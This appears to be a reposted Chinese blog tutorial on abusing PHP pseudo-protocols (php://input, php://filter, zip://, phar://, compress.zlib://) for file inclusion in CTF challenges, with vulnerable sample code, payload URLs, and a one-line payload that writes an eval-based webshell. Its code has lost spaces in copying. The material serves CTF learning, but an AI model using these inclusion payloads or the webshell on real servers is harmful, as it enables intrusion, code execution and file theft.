php get请求_ctf中关于php伪协议的考查

最新推荐文章于 2023-01-27 23:01:37 发布
最新推荐文章于 2023-01-27 23:01:37 发布
阅读量502 收藏
点赞数
文章标签: php get请求 php study 直接显示代码 php 正则图片相对路径替换成绝对路径 php 解压有密码的zip文件

33e5cd6e846cd5f3a5e11c79e2ce36d6.png

原创:Archerx 合天智汇

1php://input协议第一个例子
flag.php
<?php$flag = 'flag{flag_is_here}';
test1.php
<?php
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r'))=== 'this is test'){
echo"successn";
echo$flag;
}
else{
echo"error";
}
看上面php代码可知当读取文件的内容是thisis test时才显示flag,我们并不知道那个文件有这个内容,我们可以使用php://这个协议php://input可以得到原始的post数据,访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行,如下操作来绕过:
使用条件:
allow_url_fopen:off/on
allow_url_include:on

fd4317130d417997c1b2a8d3a13ff7a2.png

第二个例子php://input实现代码执行
test1.php改为如下
<?php
$a= $_GET["a"];
include($a);
通过POSTphp代码实现代码执行

fd4317130d417997c1b2a8d3a13ff7a2.png


执行php代码?等一下那我是不是可以写入一句话?试一下POST这段代码<?phpfputs(fopen(“shell.php”,”w”),’<?phpeval($_POST["cmd"];?>’);?>

fd4317130d417997c1b2a8d3a13ff7a2.png


注:只在php5.2.17 下测试成功,其他均出现报错,原因未知。
php://filter/convert.base64-encode/resource=
看另外一个代码:
<?php
$a= $_GET['a'];
include($a);
如何显示flag.php的内容呢?直接包含是不会显示的,这时就要用到这个php://filter/convert.base64-encode/resource=取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。
php://filter在双off的情况下也可以正常使用;
allow_url_fopen:off/on
allow_url_include:off/on

fd4317130d417997c1b2a8d3a13ff7a2.png

base64解密得到原始数据:

fd4317130d417997c1b2a8d3a13ff7a2.png

利用反序列化读取文件
借鉴2016xctf 一道题的思路,代码被我简化了:
<?php
classflag{
public$file;
publicfunction __tostring(){
echofile_get_contents($this->file);
return'yes';
}
}
$a= new flag();
$a->file= 'php://filter/convert.base64-encode/resource=flag.php';
$data= serialize($a);
echo$data.'<br>';
echounserialize($data);
定义一个flag类,并重写了tostring(),我们先new一个新对象,并给变量赋值,最后序列化一下。
假设在某个题目中序列化后变量是可控的而且我们知道类内容,那我们就可以通过可控变量实现任意文件读取,如上代码中,反序列化过程中实现了flag.php文件的读取

fd4317130d417997c1b2a8d3a13ff7a2.png


2file://协议file://协议在双off的情况下也可以正常使用;
allow_url_fopen:off/on
allow_url_include:off/on
file://用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响
前几天某比赛web第二道题就是利用注入控制反序列化,file://协议读取本地文件
注:file://协议必须是绝对路径
zip://,bzip2://, zlib://协议
双off情况下正常使用
allow_url_fopen:off/on
allow_url_include:off/on
payload:
http://127.0.0.1/cmd.php?file=zip://D:/soft/phpStudy/WWW/file.jpg%23code.txt
先将要执行的PHP代码写好文件名为phpcode.txt,将phpcode.txt进行zip压缩,压缩文件名为file.zip,如果可以上传zip文件便直接上传,若不能便将file.zip重命名为file.jpg后在上传,其他几种压缩格式也可以这样操作。
由于#在get请求中会将后面的参数忽略所以使用get请求时候应进行url编码为%23,且此处经过测试相对路径是不可行,所以只能用绝对路径。
3phar协议1.jpg是一个里面含有1.php的压缩包,改了后缀名,包含方法如下。
include.php?f=phar://./images/1.jpg/1.php
4zlib://协议使用方法:
compress.zlib://file.gz
绝对路径
http://127.0.0.1/cmd.php?file=compress.zlib://D:/soft/phpStudy/WWW/1.jpg
相对路径
http://127.0.0.1/cmd.php?file=compress.zlib://./1.jpg
5总结上面只是最基础的例子,在ctf中要会活用,正所谓再难的题也离不开基础。
题外话:近来国内ctf比赛越来越趋向于国际化,pwn、re题目占了绝大部分,web题很少或者直接没有,作为一个web狗要坚强的走下去。

weixin_39928003
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
【隐写】开局一张图,啥也看不出
蚁景网安学院
04-01 1190
最近遇到一个CTF题目,上面就一张图片是什么?啥都看不出来。今天来看一下CTF图片隐写题目,在图片里面隐藏一些不为人知的flag呢? 本次实验的地址为:《CTF Stegano练习之隐写6》。 首先来看题目。在实验主机上的C:\Stegano\6目录下提供了pic1.jpg以及pic2.jpg两个文件,请对这两文件进行分析,找到一个由两个英文单词组成的字符串Flag。 这两张图看起来都感觉都差不多全是黑白像素点,怎么去找flag呢? 这里有一个神器StegSolve,使用StegSolve提取Flag打开桌
sqlmap tamper脚本_CTF小白入门- Sqlmap 安装及使用
weixin_39537049的博客
11-26 326
Sqlmap 简介及安装Sqlmap 是开源的可以自动检测并利用sql漏洞的渗透测试工具。CTF题目经常遇到 sql注入题目,如果题目比较简单可以直接通过Sqlmap 拿到flag。Sqlmap 是基于python开发的工具。如果在Linux 系统使用Sqlmap 直接下载源码安装即可。如果要在Windows系统使用Sqlmap ,需要先安装python环境。http://sqlmap.or...
SWPUCTF 2021 新生赛
weixin_44770698的博客
12-21 3535
SWPUCTF 2021 新生赛(日常练习)
[CTFHub]302跳转:No Flag here!……(web>web前置技能>HTTP协议)
ZXW_NUDT的博客
04-28 2138
还是先来看看题目: 打开题目给的连接: 这道题其实并不难,用浏览器打开这个链接以后,按F12:可以看到: 然后用Windows自带的curl: curl -i challenge-a06bf5f7dbb6f68d.sandbox.ctfhub.com:10080/index.php 然后就可以得到flag 注意:后面那个地方(黄色笔画的)要改成php ...
[SWPUCTF 2021 新生赛] web
qq_61768489的博客
08-07 3644
简单来说: 检测路径是否存在%字符,并且如果%后面的两个字符是十六进制字符,就会对后面的两个字符进行url解码转化,如路径有%2e./,则会解码为../,转换后判断是否存在../,加入路径使用.%2e/则能绕过,导致目录穿越漏洞,因为当遍历到第一个.时,后面两个字符是%2并不是./,就不会被处理,绕过检测。没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。...
CTF-HTTP-PHP封装协议上传木马及远程命令执行
最新发布
07-31
CTF-HTTP_PHP封装协议上传木马及远程命令执行
PHP 伪协议大总结.docx
02-24
`file://`协议主要用于访问本地文件系统,它是PHP使用最为广泛的伪协议之一。在CTF竞赛或者日常开发,`file://`协议常常被用来读取本地文件,尤其是当服务器配置`allow_url_fopen`设置为`on`时,可以不受其...
CTF PHP离线chm文档
08-09
CTF PHP离线chm文档
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
ctfhub rce
zbbjya的博客
01-27 1638
eval执行 使用蚁剑打开然后 就可以得到flag了 文件包含 打开界面 php://input 伪协议相当于一个削弱post的方法 input 使用bp该包将改头 然后发送到repeater 在界面加入<?php system("ls /");?> 从raw我们会看到 flag_11583 要从得到flag使用 读取源代码图片我们可以看出问题所在 使用bp抓包然后发送到repeater php://filter 任意文件读取 ?file=php://filter
CTF】解题随笔_笔记
羊柳树的博客
12-06 680
杂项 图片类型题 隐藏flag的几种方法: 1,在图片的属性栏 2,在图片的16进制编码会有提示(可能直接给出flag,可能给出一段密文,MD5,16进制码,unicoda码等) 3,如果是 Exif 图片,用MagicExif工具查看一下这个图片的Exif信息,可能隐藏在其 4,隐写,给出的压缩图片不完整,导致隐藏了一部分图片内容,解决办法:将图片托入winHEX 调整 图片的宽和高 5,LSB图像隐藏,就用Stegsolve查看一下 6,最多的就是将几个压缩包隐藏在图片,这时就需要进行文件
buu刷题记录
missht0的博客
01-18 810
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')
记录第一次ctf比赛
姜小孩的博客
10-11 1236
第一关是在根据题目提示是在F12里一开始漫无目的的寻找,回头再看看题的时候发现他有提示:看到这都还没找到,有点蠢……然后便往回找,最终找到,第一道题看来是给出的礼物hhhhhhhh 第二关是题目提示是菜刀,但是习惯用蚁剑的我便开始了我的蚁剑之旅,点开环境大大的写着密码是wllm,我非常不好意思的直接连接,找到了flag第二关结束 第三关的题目提示是基操,给我看的蒙蒙的,点开环境仔细读代码原来是让post传id=wllm然后get传json其json需要用json格式,代码如下: <?php h
NSSCTF-Web安全入门-wp
网安小菜鸡
01-27 3510
NSSCTF-Web安全入门-wp
记一道集PHP伪协议&PHP反序列化综合运用的CTF
qq_38680693的博客
08-05 4205
题目:http://120.24.86.145:8006/test1/ 首先拿到题目后,毫无疑问,查看一下源码 &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($user,...
第二十三天
weixin_46653764的博客
07-03 355
一、来做这个题 1、第一题 flag在这里 打开后是这样的,然后点开链接,跳转到404,可查看元素,该链接跳转的地址是↓ 所以应该是被重定向了,那我就burp抓包来repeater一下,然后就得到flag.php页面的回应,flag拿到手!!! 2、第二天 打开宝盒 根据题目,我就先保存图片文件看看吧,用pad++打开,一堆乱码,大概flag就藏在里面,但我找不到hhahah 3、 看题目 本地管理员?那就伪造ip,把ip改成127.0.0.1,这里就要用到http头里面的 X-Forwarde
ctf web方向与php学习记录10
这周末在做梦的博客
09-02 281
在备份是个好习惯,本人有一个地方无法理解,接下来将解题步骤写出。 首先,利用SourceLeakHacker漏洞扫描器扫描发现如下 flag.php是空白的,那就选择bak,网页进入后是下载了一个index.php.bak文件,利用phpstorm查看 然后,就出现了md5加密函数,通过代码可知,只要破解了if的矛盾就可以拿到flag,然后就开始百度,直到出现了kekeyy和kkeyey破解方法,一脸懵逼(不知道kekeyy和kkeyey是怎么回事)。只知道md5不能加密数组,md5有特定的科学计数法的
CTF论剑场web题目(持续更新)--WEB11
jiuyongpinyin的博客
07-18 279
web11 打开页面: 先查看源码,发现没有有用的,然后发现这里有个robots,感觉像是robots.txt,进行登陆尝试: 登陆后发现了这个,当然也可以用后台的扫描工具,是可以直接扫面出来的,接着我们登陆道shell.php上: 我们假设空白处是变量a,这个函数就是告诉我们,变量a的前六位,经过MD5加密后等于后面的那个值,这个时候就属于一个小脚本了,当然我不会,这里贴出大佬的脚本: <?php $i=0; while(true) { $captcha = dechex($i); i
ctf常用的PHP伪协议
02-15
CTF比赛,常常会使用PHP伪协议来绕过服务器的安全限制或者执行本不应该执行的操作。 PHP伪协议有几种常见的形式: 1. data: 协议 这种形式的PHP伪协议通常用于在HTML嵌入PHP代码,例如: ``` ;base64,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值